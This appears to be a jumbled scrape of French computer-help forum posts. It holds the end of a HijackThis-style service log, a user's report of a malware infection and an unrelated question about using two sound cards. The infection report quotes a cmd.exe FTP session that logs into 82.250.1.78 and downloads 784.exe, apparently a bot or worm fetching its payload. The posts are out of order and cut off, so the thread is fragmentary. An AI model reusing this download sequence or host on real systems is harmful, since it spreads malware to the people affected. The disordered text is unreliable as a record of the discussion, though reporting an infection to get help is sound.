C:\Program Files\Alwil Software\Avast4\ashWebSv.exe" /service (file missing) O23 - Service: Creative Service for CDROM Access - Creative Technology Ltd - C:\WINDOWS\system32\CTSvcCDA.EXE O23 - Service: Diskeeper - Diskeeper Corporation - C:\Program Files\Diskeeper Corporation\Diskeeper\DkService.exe O23 - Service: NBService - Nero AG - C:\Program Files\Nero\Nero 7\Nero BackItUp\NBService.exe O23 - Service: Norton Unerase Protection (NProtectService) - Symantec Corporation - C:\Program Files\Norton Utilities\NPROTECT.EXE O23 - Service: Speed Disk service - Symantec Corporation - C:\Program Files\Speed Disk\nopdb.exe O23 - Service: Winpower - Zero G - C:\PROGRA~1\UpsPilot\Winpower.exe O23 - Service: Winpoweragent - Zero G - C:\PROGRA~1\UpsPilot\monitor.exe O23 - Service: Winpowerhello21 - Zero G - C:\PROGRA~1\UpsPilot\hello21.exe O23 - Service: Winpowermanager - Zero G - C:\PROGRA~1\UpsPilot\manager.exe O23 - Service: VNC Server Version 4 (WinVNC4) - Unknown owner - C:\Program Files\RealVNC\VNC4\WinVNC4.exe" -service (file missing)

OK , merci , j'y vais.

je suis derriere un routeur bewan et un scan des ports par zebulon m'a indiqué que tout etait OK ....

Bonjour , En fin de journee , en revenant a ma machine , mon ecran affiche la fenetre suivante : Titre de la fenetre : C:\system32\cmd.exe Texte : Impossible de trouver C:\Documents and Settings\xxxx\ini ftp>open 82.250.1.78 30365 Connecté à 82.250.1.78 220Reptile welcomes you.. ftp>user 1 1 331 password required 230 User logged in ftp>get 784.exe 200 PORT command successful. 150 Opening Binary mode data connection J'ai par ailleurs trouvé le fichier 784.exe que j'ai supprimé a tout hazard , et j'ai tracé l'IP sur grenoble , mais je n'y vois pas tres clair dans cette affaire qui me semble quand meme douteuse.Par ailleurs quand je fais tracer mon IP en cours , elle est situee sur Paris ....ce qui ne correspond pas a ma veritable localisation geographique.......quelqu'un ne l'utiliserait il pas induement ? Merci de m'eclairer. Un scan avec a-squared et un autre avec Adaware n'ont rien donné..???????

Bonjour , Quelqu'un pourrait-il me dire si il est envisageable ( sans risques de conflits ) d'utiliser 2 cartes son sur le meme PC afin de recuperer un port jeux sur l'une d'entre elles ? par avance merci a tous.